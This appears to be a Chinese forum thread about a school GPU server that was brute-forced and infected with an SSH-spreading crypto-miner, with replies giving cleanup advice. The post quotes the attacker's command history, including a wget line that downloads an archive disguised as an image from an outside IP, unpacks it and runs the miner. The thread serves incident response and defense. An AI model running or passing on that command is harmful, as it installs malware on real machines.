学校服务器感染挖矿病毒lasto.jpg
学校的深度学习服务器由于开过阿里云内网穿透被人暴力破解开了密码,然后被感染的服务器一直在局域网内不断尝试ssh爆破并安装挖矿脚本。查看ubuntu操作history时发现了嫌疑人的的操作记录
19792024-03-08 14:34:23wget -c 162.241.141.162/lasto.jpg;tar xzvf lasto.jpg;rm -rf lasto.jpg;cd .cache;./m lan
19802024-03-08 14:34:23nvidia-smi
19812024-03-08 14:34:23ps -x
19822024-03-08 14:34:23nvidia-smi
19832024-03-08 14:34:23sudo bash
19842024-03-08 14:34:23nvidia-smi
19852024-03-08 14:34:23exit
我按上面ip地址下载好了一份病毒样本在windows上进行解压分析,内容.cache如下:
火绒分析为病毒文件
我在服务器上删除了这几个文件。
服务器上的挖矿程序为查看定时任务时发现
cd到该.cache文件发现如下文件,下图中的upd文件已被我紧急删除防止挖矿的java名称程序启动。
upd文件内容如下:
现在我把这些文件全删除了,服务器是否还会有问题?接下来该做些什么?
maybe reinstalling OS 修改弱口令
排查该服务器网络可达的机器是否也感染病毒
排查感染服务器时间前后有变化的文件(比如服务项、SSH公钥等) 我自己的服务器有段时间也是被人挖矿,但是没种马 楼主可以分享样本吗~感谢 可以试试配个脚本定期上报显卡使用率和对应进程信息,然后隔一段时间看一下。 楼主发个样本,我正在学习网络安全的溯源反制,借个样本学习学习 都是高手啊
页:
[1]